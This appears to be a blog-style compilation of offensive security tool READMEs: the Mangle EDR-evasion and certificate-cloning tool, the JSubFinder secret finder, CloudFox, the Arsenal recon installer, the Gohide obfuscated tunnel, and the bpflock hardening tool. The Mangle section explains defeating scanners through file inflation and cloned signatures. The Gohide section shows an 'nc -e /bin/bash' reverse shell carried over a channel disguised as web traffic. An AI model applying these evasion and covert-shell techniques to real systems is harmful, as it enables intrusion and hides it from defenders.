Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners.


Contributing

Mangle was developed in Golang.

Install

The first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:

go get github.com/Binject/debug/pe

Then build it

go build Mangle.go

Important

While Mangle is written in Golang, a lot of the features are designed to work on executable files from other languages. At the time of release, the only feature that is Golang specific is the string manipulation part.

Usage

./mangle -h

_____ .__
/ \ _____ ____ ____ | | ____
/ \ / \\__ \ / \ / ___\| | _/ __ \
/ Y \/ __ \| | \/ /_/ > |_\ ___/
\____|__ (____ /___| /\___ /|____/\___ >
\/ \/ \//_____/ \/
(@Tyl0us)
Usage of ./Mangle:
-C string
Path to the file containing the certificate you want to clone
-I string
Path to the orginal file
-M Edit the PE file to strip out Go indicators
-O string
The new file name
-S int
How many MBs to increase the file by

Strings

Mangle takes the input executable and looks for known strings that security products look for or alert on. These strings alone are not the sole point of detection. Often, these strings are in conjunction with other data points and pieces of telemetry for detection and prevention. Mangle finds these known strings and replaces the hex values with random ones to remove them. IMPORTANT: Mangle replaces the exact size of the strings it’s manipulating. It doesn’t add any more or any less, as this would create misalignments and instabilities in the file. Mangle does this using the -M command-line option.

Currently, Mangle only does Golang files but as time goes on other languages will be added. If you know of any for other languages, please open an issue ticket and submit them.

Before

Β 

After


Inflate

Pretty much all EDRs can’t scan both on disk or in memory files beyond a certain size. This simply stems from the fact that large files take longer to review, scan, or monitor. EDRs do not want to impact performance by slowing down the user's productivity. Mangle inflates files by creating a padding of Null bytes (Zeros) at the end of the file. This ensures that nothing inside the file is impacted. To inflate an executable, use the -S command-line option along with the number of bytes you want to add to the file. Large payloads are really not an issue anymore with how fast Internet speeds are, that being said, it's not recommended to make a 2 gig file.

Based on test cases across numerous userland and kernel EDRs, it is recommended to increase the size by either 95-100 megabytes. Because vendors do not check large files, the activity goes unnoticed, resulting in the successful execution of shellcode.

Example:


Certificate

Mangle also contains the ability to take the full chain and all attributes from a legitimate code-signing certificate from a file and copy it onto another file. This includes the signing date, counter signatures, and other measurable attributes.

While this feature may sound similar to another tool I developed, Limelighter, the major difference between the two is that Limelighter makes a fake certificate based off a domain and signs it with the current date and time, versus using valid attributes where the timestamp is taken from when the original file. This option can use DLL or .exe files to copy using the -C command-line option, along with the path to the file you want to copy the certificate from.


Credit

  • Special thanks to Jessica of SuperNovasStore for creating the logo.
  • Special thanks to Binject for his repo


JSubFinder - Searches Webpages For Javascript And Analyzes Them For Hidden Subdomains And Secrets


JSubFinder is a tool writtin in golang to search webpages & javascript for hidden subdomains and secrets in the given URL. Developed with BugBounty hunters in mind JSubFinder takes advantage of Go's amazing performance allowing it to utilize large data sets & be easily chained with other tools.


Install

Install the application and download the signatures needed to find secrets

Using GO:

go get github.com/ThreatUnkown/jsubfinder
wget https://raw.githubusercontent.com/ThreatUnkown/jsubfinder/master/.jsf_signatures.yaml && mv .jsf_signatures.yaml ~/.jsf_signatures.yaml

or

Downloads Page

Basic Usage

Search

Search the given url's for subdomains and secrets

$ jsubfinder search -h

Execute the command specified

Usage:
JSubFinder search [flags]

Flags:
-c, --crawl Enable crawling
-g, --greedy Check all files for URL's not just Javascript
-h, --help help for search
-f, --inputFile string File containing domains
-t, --threads int Ammount of threads to be used (default 5)
-u, --url strings Url to check

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console

Examples (results are the same in this case):

$ jsubfinder search -u www.google.com
$ jsubfinder search -f file.txt
$ echo www.google.com | jsubfinder search
$ echo www.google.com | httpx --silent | jsubfinder search$

apis.google.com
ogs.google.com
store.google.com
mail.google.com
accounts.google.com
www.google.com
policies.google.com
support.google.com
adservice.google.com
play.google.com

With Secrets Enabled

note --secrets="" will save the secret results in a secrets.txt file

$ echo www.youtube.com | jsubfinder search --secrets=""
www.youtube.com
youtubei.youtube.com
payments.youtube.com
2Fwww.youtube.com
252Fwww.youtube.com
m.youtube.com
tv.youtube.com
music.youtube.com
creatoracademy.youtube.com
artists.youtube.com

Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com

Advanced examples

$ echo www.google.com | jsubfinder search -crawl -s "google_secrets.txt" -S -o jsf_google.txt -t 10 -g
  • -crawl use the default crawler to crawl pages for other URL's to analyze
  • -s enables JSubFinder to search for secrets
  • -S Silence output to console
  • -o <file> save output to specified file
  • -t 10 use 10 threads
  • -g search every URL for JS, even ones we don't think have any

Proxy

Enables the upstream HTTP proxy with TLS MITM sypport. This allows you to:

  1. Browse sites in realtime and have JSubFinder search for subdomains and secrets real time.
  2. If needed run jsubfinder on another server to offload the workload
$ JSubFinder proxy -h

Execute the command specified

Usage:
JSubFinder proxy [flags]

Flags:
-h, --help help for proxy
-p, --port int Port for the proxy to listen on (default 8444)
--scope strings Url's in scope seperated by commas. e.g www.google.com,www.netflix.com
-u, --upstream-proxy string Adress of upsteam proxy e.g http://127.0.0.1:8888 (default "http://127.0.0.1:8888")

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console
$ jsubfinder proxy
Proxy started on :8444
Subdomain: out.reddit.com
Subdomain: www.reddit.com
Subdomain: 2Fwww.reddit.com
Subdomain: alb.reddit.com
Subdomain: about.reddit.com

With Burp Suite

  1. Configure Burp Suite to forward traffic to an upstream proxy/ (User Options > Connections > Upsteam Proxy Servers > Add)
  2. Run JSubFinder in proxy mode

Burp Suite will now forward all traffic proxied through it to JSubFinder. JSubFinder will retrieve the response, return it to burp and in another thread search for subdomains and secrets.

With Proxify

  1. Launch Proxify & dump traffic to a folder proxify -output logs
  2. Configure Burp Suite, a Browser or other tool to forward traffic to Proxify (see instructions on their github page)
  3. Launch JSubFinder in proxy mode & set the upstream proxy as Proxify jsubfinder proxy -u http://127.0.0.1:8443
  4. Use Proxify's replay utility to replay the dumped traffic to jsubfinder replay -output logs -burp-addr http://127.0.0.1:8444

Run on another server

Simple, run JSubFinder in proxy mode on another server e.g 192.168.1.2. Follow the proxy steps above but set your applications upstream proxy as 192.168.1.2:8443

Advanced Examples

$ jsubfinder proxy --scope www.reddit.com -p 8081 -S -o jsf_reddit.txt
  • --scope limits JSubFinder to only analyze responses from www.reddit.com
  • -p port JSubFinders proxy server is running on
  • -S silence output to the console/stdout
  • -o <file> output examples to this file


Cloudfox - Automating Situational Awareness For Cloud Penetration Tests


CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.

CloudFox helps you answer the following common questions (and many more):

  • What regions is this AWS account using and roughly how many resources are in the account?
  • What secrets are lurking in EC2 userdata or service specific environment variables?
  • What actions/permissions does this [principal] have?
  • What roles trusts are overly permissive or allow cross-account assumption?
  • What endpoints/hostnames/IPs can I attack from an external starting point (public internet)?
  • What endpoints/hostnames/IPs can I attack from an internal starting point (assumed breach within the VPC)?
  • What filesystems can I potentially mount from a compromised resource inside the VPC?

Quick Start

CloudFox is modular (you can run one command at a time), but there is an aws all-checks command that will run the other aws commands for you with sane defaults:

cloudfox aws --profile [profile-name] all-checks

CloudFox is designed to be executed by a principal with limited read-only permissions, but it's purpose is to help you find attack paths that can be exploited in simulated compromise scenarios (aka, objective based penetration testing).

For the full documentation please refer to our wiki.

Supported Cloud Providers

Provider CloudFox Commands
AWS 15
Azure 2 (alpha)
GCP Support Planned
Kubernetes Support Planned

Install

Option 1: Download the latest binary release for your platform.

Option 2: Install Go, clone the CloudFox repository and compile from source

# git clone https://github.com/BishopFox/cloudfox.git
...omitted for brevity...
# cd ./cloudfox
# go build .
# ./cloudfox

Prerequisites

AWS

  • AWS CLI installed
  • Supports AWS profiles, AWS environment variables, or metadata retrieval (on an ec2 instance)
  • A principal with one recommended policies attached (described below)
  • Recommended attached policies: SecurityAudit + CloudFox custom policy

Additional policy notes (as of 09/2022):

Policy Notes
CloudFox custom policy Has a complete list of every permission cloudfox uses and nothing else
arn:aws:iam::aws:policy/SecurityAudit Covers most cloudfox checks but is missing newer services or permissions like apprunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices
arn:aws:iam::aws:policy/job-function/ViewOnlyAccess Covers most cloudfox checks but is missing newer services or permissions like AppRunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices - and is also missing iam:SimulatePrincipalPolicy.
arn:aws:iam::aws:policy/ReadOnlyAccess Only missing AppRunner, but also grants things like "s3:Get*" which can be overly permissive.
arn:aws:iam::aws:policy/AdministratorAccess This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :)

Azure

  • Viewer or similar permissions applied.

Supported Commands

Provider Command Name Description
AWS all-checks Run all of the other commands using reasonable defaults. You'll still want to check out the non-default options of each command, but this is a great place to start.
AWS access-keys Lists active access keys for all users. Useful for cross referencing a key you found with which in-scope account it belongs to.
AWS buckets Lists the buckets in the account and gives you handy commands for inspecting them further.
AWS ecr List the most recently pushed image URI from all repositories. Use the loot file to pull selected images down with docker/nerdctl for inspection.
AWS endpoints Enumerates endpoints from various services. Scan these endpoints from both an internal and external position to look for things that don't require authentication, are misconfigured, etc.
AWS env-vars Grabs the environment variables from services that have them (App Runner, ECS, Lambda, Lightsail containers, Sagemaker are supported. If you find a sensitive secret, use cloudfox iam-simulator AND pmapper to see who has access to them.
AWS filesystems Enumerate the EFS and FSx filesystems that you might be able to mount without creds (if you have the right network access). For example, this is useful when you have ec:RunInstance but not iam:PassRole.
AWS iam-simulator Like pmapper, but uses the IAM policy simulator. It uses AWS's evaluation logic, but notably, it doesn't consider transitive access via privesc, which is why you should also always also use pmapper.
AWS instances Enumerates useful information for EC2 Instances in all regions like name, public/private IPs, and instance profiles. Generates loot files you can feed to nmap and other tools for service enumeration.
AWS inventory Gain a rough understanding of size of the account and preferred regions.
AWS outbound-assumed-roles List the roles that have been assumed by principals in this account. This is an excellent way to find outbound attack paths that lead into other accounts.
AWS permissions Enumerates IAM permissions associated with all users and roles. Grep this output to figure out what permissions a particular principal has rather than logging into the AWS console and painstakingly expanding each policy attached to the principal you are investigating.
AWS principals Enumerates IAM users and Roles so you have the data at your fingertips.
AWS role-trusts Enumerates IAM role trust policies so you can look for overly permissive role trusts or find roles that trust a specific service.
AWS route53 Enumerate all records from all route53 managed zones. Use this for application and service enumeration.
AWS secrets List secrets from SecretsManager and SSM. Look for interesting secrets in the list and then see who has access to them using use cloudfox iam-simulator and/or pmapper.
Azure instances-map Enumerates useful information for Compute instances in all available resource groups and subscriptions
Azure rbac-map Enumerates Role Assignments for all tenants

Authors

Contributing

Wiki - How to Contribute

TODO

  • AWS - Add support for GovCloud and China regions
  • AWS - Add support for hardcoded region (which would override the default of looking in every region)

FAQ

How does CloudFox compare with ScoutSuite, Prowler, Steampipe's AWS Compliance Module, AWS Security Hub, etc.

CloudFox doesn't create any alerts or findings, and doesn't check your environment for compliance to a baseline or benchmark. Instead, it simply enables you to be more efficient during your manual penetration testing activities. If gives you the information you'll likely need to validate whether an attack path is possible or not.

Why do I see errors in some CloudFox commands?

  • Services that don't exist in all regions - CloudFox currently makes the same API calls to every region. However, not all regions support all services. For instance, services like Appstream and AWS Grafana are only supported in a subset of the total regions. In the future, we plan to make CloudFox aware of which services run in each region.
  • You don't have permission - Another reason you might see errors if you don't have permissions to make calls that CloudFox is making. Either because the policy doesn't allow it (e.g., SecurityAudit doesn't allow all of the permissions CloudFox needs. Or, it might be an SCP that is blocking you.

You can always look in the ~/.cloudfox/cloudfox-error.log file to get more information on errors.

Prior work and other related projects

  • SmogCloud - Inspiration for the endpoints command
  • SummitRoute's AWS Exposable Resources - Inspiration for the endpoints command
  • Steampipe - We used steampipe to prototype many cloudfox commands. While CloudFox is laser focused on helping cloud penetration testers, steampipe is an easy way to query any and all of your cloud resources.
  • Principal Mapper - Inspiration for, and a strongly recommended partner to the iam-simulator command
  • Cloudsplaining - Inspiration for the permissions command
  • ScoutSuite - Excellent cloud security benchmark tool. Provided inspiration for the --userdata functionality in the instances command, the permissions command, and many others
  • Prowler - Another excellent cloud security benchmark tool.
  • Pacu - Excellent cloud penetration testing tool. PACU has quite a few enumeration commands similar to CloudFox, and lots of other commands that automate exploitation tasks (something that CloudFox avoids by design)
  • CloudMapper - Inspiration for the inventory command and just generally CloudFox as a whole


Arsenal - Recon Tool installer



Arsenal is a Simple shell script (Bash) used to install the most important tools and requirements for your environment and save time in installing all these tools.


Tools in Arsenal

Name description
Amass The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques
ffuf A fast web fuzzer written in Go
dnsX Fast and multi-purpose DNS toolkit allow to run multiple DNS queries
meg meg is a tool for fetching lots of URLs but still being 'nice' to servers
gf A wrapper around grep to avoid typing common patterns
XnLinkFinder This is a tool used to discover endpoints crawling a target
httpX httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads
Gobuster Gobuster is a tool used to brute-force (DNS,Open Amazon S3 buckets,Web Content)
Nuclei Nuclei tool is Golang Language-based tool used to send requests across multiple targets based on nuclei templates leading to zero false positive or irrelevant results and provides fast scanning on various host
Subfinder Subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well
Naabu Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT scans on the host/list of hosts and lists all ports that return a reply
assetfinder Find domains and subdomains potentially related to a given domain
httprobe Take a list of domains and probe for working http and https servers
knockpy Knockpy is a python3 tool designed to quickly enumerate subdomains on a target domain through dictionary attack
waybackurl fetch known URLs from the Wayback Machine for *.domain and output them on stdout
Logsensor A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning
Subzy Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Xss-strike Advanced XSS Detection Suite
Altdns Subdomain discovery through alterations and permutations
Nosqlmap NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases and web applications using NoSQL in order to disclose or clone data from the database
ParamSpider Parameter miner for humans
GoSpider GoSpider - Fast web spider written in Go
eyewitness EyeWitness is a Python tool written by @CptJesus and @christruncer. It’s goal is to help you efficiently assess what assets of your target to look into first.
CRLFuzz A fast tool to scan CRLF vulnerability written in Go
DontGO403 dontgo403 is a tool to bypass 40X errors
Chameleon Chameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technologies
uncover uncover is a go wrapper using APIs of well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and utilize the results with your current pipeline tools
wpscan WordPress Security Scanner

Requirements in Arsenal

  • Python3
  • Git
  • Ruby
  • Wget
  • GO-Lang
  • Rust:fast:

Go-lang installation

 sudo apt-get remove -y golang-go
sudo rm -rf /usr/local/go
wget https://go.dev/dl/go1.19.1.linux-amd64.tar.gz
sudo tar -xvf go1.19.1.linux-amd64.tar.gz
sudo mv go /usr/local
nano /etc/profile or .profile
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$GOPATH/bin
source /etc/profile #to update you shell dont worry

How to install

git clone https://github.com/Micro0x00/Arsenal.git
cd Arsenal
sudo chmod +x Arsenal.sh
sudo ./Arsenal.sh




Gohide - Tunnel Port To Port Traffic Over An Obfuscated Channel With AES-GCM Encryption


Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption.

Obfuscation Modes

  • Session Cookie HTTP GET (http-client)
  • Set-Cookie Session Cookie HTTP/2 200 OK (http-server)
  • WebSocket Handshake "Sec-WebSocket-Key" (websocket-client)
  • WebSocket Handshake "Sec-WebSocket-Accept" (websocket-server)
  • No obfuscation, just use AES-GCM encrypted messages (none)

AES-GCM is enabled by default for each of the options above.


Usage

root@WOPR-KALI:/opt/gohide-dev# ./gohide -h
Usage of ./gohide:
-f string
listen fake server -r x.x.x.x:xxxx (ip/domain:port) (default "0.0.0.0:8081")
-key openssl passwd -1 -salt ok | md5sum
aes encryption secret: use '-k openssl passwd -1 -salt ok | md5sum' to derive key from password (default "5fe10ae58c5ad02a6113305f4e702d07")
-l string
listen port forward -l x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:8080")
-m string
obfuscation mode (AES encrypted by default): websocket-client, websocket-server, http-client, http-server, none (default "none")
-pem string
path to .pem for TLS encryption mode: default = use hardcoded key pair 'CN:target.com', none = plaintext mode (default "default")
-r string
forward to remote fake server -r x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:9999")

Scenario

Box A - Reverse Handler.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r target.com:9091 -m websocket-client
Local Port Forward Listening: 127.0.0.1:8080
FakeSrv Listening: 0.0.0.0:8081

Box B - Target.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:9091 -l 127.0.0.1:9090 -r target.com:8081 -m websocket-server
Local Port Forward Listening: 127.0.0.1:9090
FakeSrv Listening: 0.0.0.0:9091

Note: /etc/hosts "127.0.0.1 target.com"

Box B - Netcat /bin/bash

root@WOPR-KALI:/var/tmp# nc -e /bin/bash 127.0.0.1 9090

Box A - Netcat client

root@WOPR-KALI:/opt/gohide# nc -v 127.0.0.1 8080
localhost [127.0.0.1] 8080 (http-alt) open
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux WOPR-KALI 5.3.0-kali2-amd64 #1 SMP Debian 5.3.9-1kali1 (2019-11-11) x86_64 GNU/Linux
netstat -pantwu
Active Internet connections (servers and established)
tcp 0 0 127.0.0.1:39684 127.0.0.1:8081 ESTABLISHED 14334/./gohide

Obfuscation Samples

websocket-client (Box A to Box B)

  • Sec-WebSocket-Key contains AES-GCM encrypted content e.g. "uname -a".
GET /news/api/latest HTTP/1.1
Host: cdn-tb0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: 6jZS+0Wg1IP3n33RievbomIuvh5ZdNMPjVowXm62
Sec-WebSocket-Version: 13

websocket-server (Box B to Box A)

  • Sec-WebSocket-Accept contains AES-GCM encrypted output.
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: URrP5l0Z3NIHXi+isjuIyTSKfoP60Vw5d2gqcmI=

http-client

  • Session cookie header contains AES-GCM encrypted content
GET /news/api/latest HTTP/1.1
Host: cdn-tbn0.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://www.bbc.co.uk/
Connection: keep-alive
Cookie: Session=R7IJ8y/EBgCanTo6fc0fxhNVDA27PFXYberJNW29; Secure; HttpOnly

http-server

  • Set-Cookie header contains AES-GCM encrypted content.
HTTP/2.0 200 OK
content-encoding: gzip
content-type: text/html; charset=utf-8
pragma: no-cache
server: nginx
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
cache-control: no-cache, no-store, must-revalidate
expires: Thu, 21 Nov 2019 01:07:15 GMT
date: Thu, 21 Nov 2019 01:07:15 GMT
content-length: 30330
vary: Accept-Encoding
X-Firefox-Spdy: h2
Set-Cookie: Session=gWMnQhh+1vkllaOxueOXx9/rLkpf3cmh5uUCmHhy; Secure; Path=/; HttpOnly

none

8JWxXufVora2FNa/8m2Vnub6oiA2raV4Q5tUELJA

Β 


Β 

Future

  • Fix up error handling.

Enjoy~



Hackers Hide Malware in Stunning Images Taken by James Webb Space Telescope

A persistent Golang-based malware campaign dubbed GO#WEBBFUSCATOR has leveraged the deep field image taken from NASA's James Webb Space Telescope (JWST) as a lure to deploy malicious payloads on infected systems. The development, revealed by Securonix, points to the growing adoption of Go among threat actors, given the programming language's cross-platform support, effectively allowing the

New Golang-based 'Agenda Ransomware' Can Be Customized For Each Victim

A new ransomware strain written in Golang dubbed "Agenda" has been spotted in the wild, targeting healthcare and education entities in Indonesia, Saudi Arabia, South Africa, and Thailand. "Agenda can reboot systems in safe mode, attempts to stop many server-specific processes and services, and has multiple modes to run," Trend Micro researchersΒ saidΒ in an analysis last week. Qilin, the threat

Bpflock - eBPF Driven Security For Locking And Auditing Linux Machines


bpflock - eBPF driven security for locking and auditing Linux machines.

Note: bpflock is currently in experimental stage, it may break, options and security semantics may change, some BPF programs will be updated to use Cilium ebpf library.


1. Introduction

bpflock uses eBPF to strength Linux security. By restricting access to a various range of Linux features, bpflock is able to reduce the attack surface and block some well known attack techniques.

Only programs like container managers, systemd and other containers/programs that run in the host pid and network namespaces are allowed access to full Linux features, containers and applications that run on their own namespace will be restricted. If bpflock bpf programs run under the restricted profile then all programs/containers including privileged ones will have their access denied.

bpflock protects Linux machines by taking advantage of multiple security features including Linux Security Modules + BPF.

Architecture and Security design notes:

  • bpflock is not a mandatory access control labeling solution, and it does not intent to replace AppArmor, SELinux, and other MAC solutions. bpflock uses a simple declarative security profile.
  • bpflock offers multiple small bpf programs that can be reused in multiple contexts from Cloud Native deployments to Linux IoT devices.
  • bpflock is able to restrict root from accessing certain Linux features, however it does not protect against evil root.

2. Functionality Overview

2.1 Security features

bpflock offer multiple security protections that can be classified as:

2.2 Semantics

bpflock keeps the security semantics simple. It support three global profiles to broadly cover the security sepctrum, and restrict access to specific Linux features.

  • profile: this is the global profile that can be applied per bpf program, it takes one of the followings:

    • allow|none|privileged : they are the same, they define the least secure profile. In this profile access is logged and allowed for all processes. Useful to log security events.
    • baseline : restrictive profile where access is denied for all processes, except privileged applications and containers that run in the host namespaces, or per cgroup allowed profiles in the bpflock_cgroupmap bpf map.
    • restricted : heavily restricted profile where access is denied for all processes.
  • Allowed or blocked operations/commands:

    Under the allow|privileged or baseline profiles, a list of allowed or blocked commands can be specified and will be applied.

    • --protection-allow : comma-separated list of allowed operations. Valid under baseline profile, this is useful for applications that are too specific and perform privileged operations. It will reduce the use of the allow | privileged profile, so instead of using the privileged profile, we can specify the baseline one and add a set of allowed commands to offer a case-by-case definition for such applications.
    • --protection-block : comma-separated list of blocked operations. Valid under allow|privileged and baseline profiles, it allows to restrict access to some features without using the full restricted profile that might break some specific applications. Using baseline or privileged profiles opens the gate to access most Linux features, but with the --protection-block option some of this access can be blocked.

For bpf security examples check bpflock configuration examples

3. Deployment

3.1 Prerequisites

bpflock needs the following:

  • Linux kernel version >= 5.13 with the following configuration:

    Obviously a BTF enabled kernel.

    Enable BPF LSM support

    If your kernel was compiled with CONFIG_BPF_LSM=y check the /boot/config-* to confirm, but when running bpflock it fails with:

    must have a kernel with 'CONFIG_BPF_LSM=y' 'CONFIG_LSM=\"...,bpf\"'"

    Then to enable BPF LSM as an example on Ubuntu:

    1. Open the /etc/default/grub file as privileged of course.
    2. Append the following to the GRUB_CMDLINE_LINUX variable and save.
      "lsm=lockdown,capability,yama,apparmor,bpf"
      or
      GRUB_CMDLINE_LINUX="lsm=lockdown,capability,yama,apparmor,bpf"
    3. Update grub config with:
      sudo update-grub2
    4. Reboot into your kernel.

    3.2 Docker deployment

    To run using the default allow or privileged profile (the least secure profile):

    docker run --name bpflock -it --rm --cgroupns=host \
    --pid=host --privileged \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Fileless Binary Execution

    To log and restict fileless binary execution run with:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_FILELESSLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    When running under restricted profile, the container logs will display:

    Running under the restricted profile may break things, this is why the default profile is allow.

    Kernel Modules Protection

    To apply Kernel Modules Protection run with environment variable BPFLOCK_KMODLOCK_PROFILE=baseline or BPFLOCK_KMODLOCK_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KMODLOCK_PROFILE=restricted" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example:

    $ sudo unshare -p -n -f
    # modprobe xfs
    modprobe: ERROR: could not insert 'xfs': Operation not permitted
    Kernel Image Lock-down

    To apply Kernel Image Lock-down run with environment variable BPFLOCK_KIMGLOCK_PROFILE=baseline:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_KIMGLOCK_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock
    $ sudo unshare -f -p -n bash
    # head -c 1 /dev/mem
    head: cannot open '/dev/mem' for reading: Operation not permitted
    BPF Protection

    To apply bpf restriction run with environment variable BPFLOCK_BPFRESTRICT_PROFILE=baseline or BPFLOCK_BPFRESTRICT_PROFILE=restricted:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -e "BPFLOCK_BPFRESTRICT_PROFILE=baseline" \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Example running in a different pid and network namespaces and using bpftool:

    $ sudo unshare -f -p -n bash
    # bpftool prog
    Error: can't get next program: Operation not permitted
    Running with the -e "BPFLOCK_BPFRESTRICT_PROFILE=restricted" profile will deny bpf for all:
    3.3 Configuration and Environment file

    Passing configuration as bind mounts can be achieved using the following command.

    Assuming bpflock.yaml and bpf.d profiles configs are in current directory inside bpflock directory, then we can just use:

    ls bpflock/
    bpf.d bpflock.d bpflock.yaml
    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    -v $(pwd)/bpflock/:/etc/bpflock \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    Passing environment variables can also be done with files using --env-file. All parameters can be passed as environment variables using the BPFLOCK_$VARIABLE_NAME=VALUE format.

    Example run with environment variables in a file:

    docker run --name bpflock -it --rm --cgroupns=host --pid=host --privileged \
    --env-file bpflock.env.list \
    -v /sys/kernel/:/sys/kernel/ \
    -v /sys/fs/bpf:/sys/fs/bpf linuxlock/bpflock

    4. Documentation

    Documentation files can be found here.

    5. Build

    bpflock uses docker BuildKit to build and Golang to make some checks and run tests. bpflock is built inside Ubuntu container that downloads the standard golang package.

    Run the following to build the bpflock docker container:

    git submodule update --init --recursive
    make

    Bpf programs are built using libbpf. The docker image used is Ubuntu.

    If you want to only build the bpf programs directly without using docker, then on Ubuntu:

    sudo apt install -y pkg-config bison binutils-dev build-essential \
    flex libc6-dev clang-12 libllvm12 llvm-12-dev libclang-12-dev \
    zlib1g-dev libelf-dev libfl-dev gcc-multilib zlib1g-dev \
    libcap-dev libiberty-dev libbfd-dev

    Then run:

    make bpf-programs

    In this case the generated programs will be inside the ./bpf/build/... directory.

    Credits

    bpflock uses lot of resources including source code from the Cilium and bcc projects.

    License

    The bpflock user space components are licensed under the Apache License, Version 2.0. The BPF code where it is noted is licensed under the General Public License, Version 2.0.



❌